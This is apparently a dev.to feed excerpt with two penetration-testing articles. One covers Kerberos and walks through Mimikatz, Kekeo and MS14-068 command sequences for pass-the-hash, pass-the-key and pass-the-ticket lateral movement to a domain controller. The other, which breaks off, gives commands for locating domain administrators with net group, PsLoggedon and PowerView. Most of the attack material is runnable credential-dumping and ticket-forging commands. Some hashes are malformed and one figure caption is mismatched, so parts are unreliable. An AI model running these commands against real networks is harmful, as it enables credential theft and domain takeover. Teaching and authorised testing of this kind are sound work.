&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9od7m10riqpp0uk2t7xk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9od7m10riqpp0uk2t7xk.png" alt=" " width="800" height="589"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fled1zd7l7dn4zfxa6reu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fled1zd7l7dn4zfxa6reu.png" alt=" " width="720" height="359"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Kerberos Protocol Workflow
&lt;/h3&gt;

&lt;p&gt;The Kerberos protocol operates within a domain context according to the following simplified procedure:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The client machine computes an NTLM hash of the user's plaintext password and encrypts it with a timestamp, utilising the krbtgt password hash as the key. This ciphertext is transmitted to the Key Distribution Centre (KDC), or domain controller. The KDC authenticates the user and subsequently generates a Ticket-Granting Ticket (TGT). The TGT's cryptographic signature is returned to the client; within the Kerberos framework, the TGT data can only be deciphered by the domain user krbtgt.&lt;/li&gt;
&lt;li&gt;Subsequently, the client presents the TGT to the KDC to request a Ticket-Granting Service (TGS) ticket. The KDC validates the submitted TGT. Upon successful verification, it encrypts the target service account's NTLM hash and the TGT, returning the resultant ciphertext to the client.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The following definitions distinguish the three credential transfer techniques:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PTH (Pass the Hash):&lt;/strong&gt; A penetration testing method conducted using the value of the &lt;strong&gt;LM or NTLM hash&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTT (Pass the Ticket):&lt;/strong&gt; A penetration test performed by utilising the &lt;strong&gt;TGT credentials&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTK (Pass the Key):&lt;/strong&gt; A penetration test executed using the &lt;strong&gt;ekeys AES256 hash&lt;/strong&gt; (this key material can be obtained via the &lt;code&gt;sekurlsa::ekeys&lt;/code&gt; command within Mimikatz).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;On Authentication Hashes:&lt;/strong&gt;&lt;br&gt;
Windows operating systems utilise two primary hashing algorithms: LM Hash and NTLM Hash. For personal systems running Windows Vista or later, and server systems from Windows Server 2003 onwards, the standard authentication method is exclusively NTLM Hash.&lt;/p&gt;

&lt;p&gt;A ticket may be conceptualised as analogous to a cookie deposited upon login to a website, or a persistent credential established between a computer and a remote entity. This ticket can subsequently be reused to re-establish a connection, functioning precisely like a session cookie. While PTH and PTK utilise identical connection protocols, PTT operates distinctly via the Kerberos protocol.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PTH Mechanism:&lt;/strong&gt;&lt;br&gt;
PTH constitutes a classic attack vector in intranet penetration. Its operational principle permits an attacker to remotely access a host or service by leveraging the LM Hash and NTLM Hash values, without necessitating the corresponding plaintext password. &lt;em&gt;In essence, it suffices to acquire the encrypted hash value to mount an attack; the plaintext password is not required.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The attack landscape is nuanced. If NTLM authentication is disabled, the tool PsExec cannot establish a remote connection using the obtained NTLM hash; however, Mimikatz can still facilitate a successful attack. On specific operating systems—8.1/2012r2, and upon installation of Win 7/2008r2/8/2012 with patch KB2871997—&lt;strong&gt;AES keys may substitute for the NT hash to execute a PTK attack.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Summary: Impact of the KB2871997 Patch (systeminfo can verify patch installation)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PTH:&lt;/strong&gt; On unpatched systems, any user can connect. Post-patch, only the built-in Administrator account connection is permitted.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTK:&lt;/strong&gt; The patch enables connections using the AES256 key for any user.&lt;/li&gt;
&lt;li&gt;Refer to: &lt;em&gt;Does KB2871997 truly defend against PTH attacks? - FreeBuf Cybersecurity Industry Portal&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Nature of PTT Attacks:&lt;/strong&gt;&lt;br&gt;
The PTT attack modality diverges from simple NTLM authentication. It is an attack leveraging the Kerberos protocol. Three prevalent attack methodologies are introduced here: the MS14-068 exploit, Golden Ticket, and Silver Ticket. Succinctly, these methods function by injecting a forged yet legitimate ticket into system memory to achieve a connection.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MS14-068 Vulnerability:&lt;/strong&gt; An elevation of privilege vulnerability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Golden Ticket &amp;amp; Silver Ticket:&lt;/strong&gt; These are categorised as &lt;strong&gt;persistence and privilege maintenance techniques&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;The MS14-068 vulnerability is hazardous because it enables any ordinary domain user to elevate their privileges to domain administrator. Microsoft's corrective patch is KB3011780.&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Technique Summaries
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Domain Lateral Movement via PTH Transfer - Mimikatz&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domain Lateral Movement via PTK Transfer - Mimikatz&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domain Lateral Movement via PTT Transfer - MS14-068 &amp;amp; Kekeo &amp;amp; Local Tickets&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domestic Ladon Intranet Penetration Framework Testing - Information Gathering, Connectivity, etc.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl6g8rkt1usdkgm8f2r34.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl6g8rkt1usdkgm8f2r34.png" alt=" " width="800" height="401"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h2&gt;
  
  
  Case Study 1: Domain Lateral Movement via PTH Transfer - Mimikatz
&lt;/h2&gt;

&lt;p&gt;This method, Pass the Hash, operates by discovering the password hash value (typically the NTLM hash) associated with an account. In a domain environment, where most computers are logged onto by domain users, a significant number of machines share an identical local administrator password set during installation. Consequently, if the local administrator credentials are uniform, an attacker can utilise a hash passing technique to log into other machines across the intranet. The critical advantage for the attacker is circumventing the computationally expensive and time-consuming process of cracking the password hash to reveal the plaintext.&lt;/p&gt;

&lt;p&gt;Mimikatz serves as the instrumental tool for PTH, functioning not only as a credential harvester and plaintext password extractor but also as an attack platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PTH NTLM Transfer Commands:&lt;/strong&gt;&lt;br&gt;
For unpatched workgroup and domain connections:&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7&lt;/code&gt; (Assuming knowledge of the domain controller hash)&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad458a5695dc997aa02d455c&lt;/code&gt; (workgroup designates a local user connection)&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad217334fe7&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Target example: \OWA2010CN-God.god.org (Domain Controller)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Experimental Demonstration:&lt;/strong&gt;&lt;br&gt;
Execute the following sequence within an elevated PowerShell console on a 2008R2 x64 web server:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Command sequence:
privilege::debug
sekurlsa::logonPasswords (to extract plaintext passwords)
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 (Mimikatz will spawn a new command prompt window upon execution)
In the newly spawned window, execute: dir \\192.168.3.21\c$ (if the IP address is not resolvable, substitute the target's hostname)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Case Study 2: Domain Lateral Movement via PTK Transfer - Mimikatz
&lt;/h2&gt;

&lt;p&gt;This method utilises the AES256 key.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Commands for Patched Workgroup and Domain Connections:&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;sekurlsa::ekeys&lt;/code&gt; # retrieves the AES key material&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:mary /domain:god /aes256:d7c110753a2f7f240e5b2701dc1d16a16e40af3c5cdf814781c4b&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Crucially, for a PTK attack to succeed for a non-administrator user, the target system must have the KB2871997 patch installed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh4cg4keu31xahutfyphl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh4cg4keu31xahutfyphl.png" alt=" " width="800" height="348"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Case Study 3: Domain Lateral Movement via PTT Transfer - MS14-068 &amp;amp; Kekeo &amp;amp; Local Tickets
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;First Method: Exploiting the MS14-068 Vulnerability&lt;/strong&gt;&lt;br&gt;
This technique enables an ordinary domain user to directly obtain domain controller system privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Procedure for MS14-068 via PowerShell:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Ascertain the current Security Identifier (SID):&lt;/strong&gt; &lt;code&gt;whoami /user&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Credential Management:&lt;/strong&gt;
&lt;code&gt;mimikatz # kerberos::purge&lt;/code&gt; // Purges all existing credentials on the current machine, as lingering domain member certificates can interfere with ticket forgery.
&lt;code&gt;mimikatz # kerberos::list&lt;/code&gt; // Inspect current machine certificates.
&lt;code&gt;mimikatz # kerberos::ptc &amp;lt;ticket_filename&amp;gt;&lt;/code&gt; // Inject a generated ticket into memory.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Generate TGT Data via MS14-068:&lt;/strong&gt;
&lt;code&gt;ms14-068.exe -u &amp;lt;DomainMember&amp;gt;@&amp;lt;domain&amp;gt; -s &amp;lt;sid&amp;gt; -d &amp;lt;domain_controller_address&amp;gt; -p &amp;lt;domain_member_password&amp;gt;&lt;/code&gt;
&lt;em&gt;Example:&lt;/em&gt; &lt;code&gt;MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-21573346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Inject the Forged Ticket into Memory:&lt;/strong&gt;
&lt;code&gt;mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Verify Credential Cache:&lt;/strong&gt; &lt;code&gt;klist&lt;/code&gt; (Displays current connections; use &lt;code&gt;klist purge&lt;/code&gt; to delete tickets).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Leverage the Access:&lt;/strong&gt;
&lt;code&gt;dir \\192.168.3.21\c$&lt;/code&gt; (or &lt;code&gt;net use&lt;/code&gt; for connection; if IP fails, use the hostname).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The principle of this ticket passing attack lies in generating a syntactically correct connection request and importing it into memory via Mimikatz, thereby obviating the need for a password during the connection phase.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Second Method: Utilising the Kekeo Tool&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Generate the Ticket:&lt;/strong&gt;
&lt;code&gt;kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a5dc997aa02d45c"&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Import the Ticket:&lt;/strong&gt;
&lt;code&gt;kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Verify Credential Cache:&lt;/strong&gt; &lt;code&gt;klist&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Establish Connection:&lt;/strong&gt;
&lt;code&gt;dir \\192.168.3.21\c$&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Third Method: Exploiting Local Tickets (Requires Local Administrator Privileges)&lt;/strong&gt;&lt;br&gt;
This method essentially involves the harvesting and reuse of valid, pre-existing session cookies. The initial step is to use Mimikatz to export local tickets and subsequently import them into memory.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Command Sequence:&lt;/strong&gt;
&lt;code&gt;sekurlsa::tickets /export&lt;/code&gt;
&lt;code&gt;kerberos::ptt xxxxxxxxx.xxx.kirbi&lt;/code&gt; (This action retrieves the previously stored "cookie" and tests its validity; credentials remain valid for a 10-hour window).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt; PTT delivery does not mandate local administrator privileges. Connections should be established using the hostname. The technique is predicated upon known vulnerabilities, dedicated tools, or the harvesting of locally cached tickets.&lt;/p&gt;




&lt;h2&gt;
  
  
  Case Study 4: The Ladon Intranet Penetration Framework - Testing and Validation
&lt;/h2&gt;

&lt;p&gt;This section covers the practical application of Ladon for Information Gathering, Protocol Scanning, Vulnerability Probing, and Credential Passing Attacks.&lt;/p&gt;

&lt;p&gt;Ladon functions as a large-scale intranet penetration scanner, often used in conjunction with Cobalt Strike. Ladon version 8.9 incorporates 120 built-in modules for tasks including information gathering, live host detection, port scanning, service identification, password spraying, vulnerability detection, and vulnerability exploitation. Vulnerability detection encompasses MS17-010 (EternalBlue), SMBGhost, WebLogic, ActiveMQ, Tomcat, and Struts2. Password spraying targets databases (MySQL, Oracle, MSSQL), remote access protocols (FTP, SSH for Linux, VNC), and Windows services (IPC, WMI, SMB, NetBIOS, LDAP, SmbHash, WmiHash, WinRM). Remote command execution supports multiple methods (smbexec, wmiexec, psexec, atexec, sshtexec) and exploitation frameworks (e.g., sshell, Webshell). Version X-4.0 and subsequent iterations are discussed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Resources:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Ladon Repository: &lt;code&gt;https://github.com/k8gege/Ladon&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Kekeo Releases: &lt;code&gt;https://github.com/gentilkiwi/kekeo/releases&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;MS14-068 Exploit: &lt;code&gt;https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>domain</category>
      <category>cybersecurity</category>
      <category>offensive</category>
      <category>credential</category>
    </item>
    <item>
      <title>Rapid Identification of Domain Administrators and Domain Controllers in Internal Network Penetration Testing</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 09:13:56 +0000</pubDate>
      <link>https://dev.to/excalibra/rapid-identification-of-domain-administrators-and-domain-controllers-in-internal-network-24k5</link>
      <guid>https://dev.to/excalibra/rapid-identification-of-domain-administrators-and-domain-controllers-in-internal-network-24k5</guid>
      <description>&lt;p&gt;In the process of internal network penetration testing, the ability to rapidly identify Domain Administrators and Domain Controllers is of paramount importance. Several commonly employed methods are introduced below.&lt;/p&gt;

&lt;h2&gt;
  
  
  Locating Domain Administrators
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Command Line Identification
&lt;/h3&gt;

&lt;p&gt;The following command can be executed in the command prompt to query domain administrator accounts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net group "Domain Admins" /domain            //Query Domain Administrators
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6ckha3bhx0fbbrvdddhq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6ckha3bhx0fbbrvdddhq.png" alt="Figure 2: AV detection results for executables with embedded shellcode" width="800" height="310"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 1: Output of the net group command listing Domain Administrators.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Tool-Based Identification
&lt;/h3&gt;

&lt;p&gt;Several specialised tools can facilitate the enumeration of Domain Administrator accounts and their logged-on locations.&lt;/p&gt;

&lt;h4&gt;
  
  
  PSLoggedon.exe
&lt;/h4&gt;

&lt;p&gt;This utility identifies users logged on to a system by examining the registry key &lt;code&gt;HKEY_USERS&lt;/code&gt; and utilising the &lt;code&gt;NetSessionEnum&lt;/code&gt; API. Note that certain functionalities of this tool require elevated, administrator-level privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download Link:&lt;/strong&gt; &lt;code&gt;https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon&lt;/code&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Displays supported options and units of measurement for output values.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-l&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Shows only local logons, excluding local and network resource logons.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-x&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Does not display logon times.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\computername&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Specifies the name of the computer for which logon information is to be listed.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;username&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Specifies a user name to search for across the network for machines where that user is logged on.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;To locate a specific user, such as 'Administrator', the tool is invoked as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PsLoggedon.exe Administrator
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzmbputd5riz7z41aflxz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzmbputd5riz7z41aflxz.png" alt="Figure 2: Enumeration results showing machines where the Administrator user has logged on." width="799" height="215"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 2: Enumeration results showing machines where the Administrator user has logged on.
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;To query a specific machine, the command is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PsLoggedon.exe \AD-server
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7mze0gyv435ymj0yu295.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7mze0gyv435ymj0yu295.png" alt="Figure 3: Output displaying users currently logged on to the machine AD-server." width="571" height="208"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 3: Output displaying users currently logged on to the machine AD-server.
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  PVefindaduser.exe
&lt;/h4&gt;

&lt;p&gt;This tool is designed to ascertain the logon locations of Active Directory users, enumerate domain users, and identify users logged on to specific computers, including local users, those connected via RDP, and accounts used to run services and scheduled tasks. This tool also requires administrator privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download Link:&lt;/strong&gt; &lt;code&gt;https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn&lt;/code&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-h&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Displays help information.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-u&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Checks if a newer version of the programme is available.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-current ["username"]&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Displays the user currently logged on to each PC within the domain. If a username is specified in quotation marks, it only displays PCs where that particular user is logged on.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-noping&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevents the tool from pinging target computers before attempting to enumerate user logons.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-target&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;An optional parameter for specifying a comma-separated list of hostnames to query. If omitted, all hosts in the current domain are queried. Results are output to a &lt;code&gt;report.csv&lt;/code&gt; file.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Executing the command &lt;code&gt;pvefinaduser.exe -current&lt;/code&gt; will display all users currently logged on to all machines within the domain.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4bproa3o2ngqgr53dd8h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4bproa3o2ngqgr53dd8h.png" alt="Figure 4: Console output of PVefindaduser.exe showing current logon sessions across the domain" width="800" height="465"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 4: Console output of PVefindaduser.exe showing current logon sessions across the domain
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;This operation generates a &lt;code&gt;report.csv&lt;/code&gt; file on the target machine, which can be retrieved for subsequent analysis.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fp0cfxnepw7w50qumm86j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fp0cfxnepw7w50qumm86j.png" alt="Figure 5: The contents of the generated report.csv file, detailing user logon locations." width="800" height="45"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 5: The contents of the generated report.csv file, detailing user logon locations.
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  PowerView.ps1
&lt;/h4&gt;

&lt;p&gt;This PowerShell script is a component of the PowerSploit toolkit and serves as a robust instrument for gathering domain information. A suite of cmdlets is provided, including &lt;code&gt;Get-NetUser&lt;/code&gt;, &lt;code&gt;Get-NetDomainController&lt;/code&gt;, and &lt;code&gt;Invoke-UserHunter&lt;/code&gt;, which specifically aids in identifying the computers to which domain users are logged on and whether they possess local administrator privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download Link:&lt;/strong&gt; &lt;code&gt;https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;To locate Domain Administrators using PowerView, one may bypass the execution policy and invoke the script as demonstrated below:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;powershell.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-exec&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bypass&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"&amp;amp; {Import-Module C:\Users\win7\Desktop\tool\PowerView.ps1; Invoke-UserEvenHunter}"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7w8wfk9guat9fqx8g4lv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7w8wfk9guat9fqx8g4lv.png" alt="Figure 6: Output from the Invoke-UserEvenHunter function in PowerView, identifying logged-on domain users." width="672" height="331"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 6: Output from the Invoke-UserEvenHunter function in PowerView, identifying logged-on domain users.
  &lt;p&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Locating Domain Controllers
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Command Line Identification
&lt;/h3&gt;

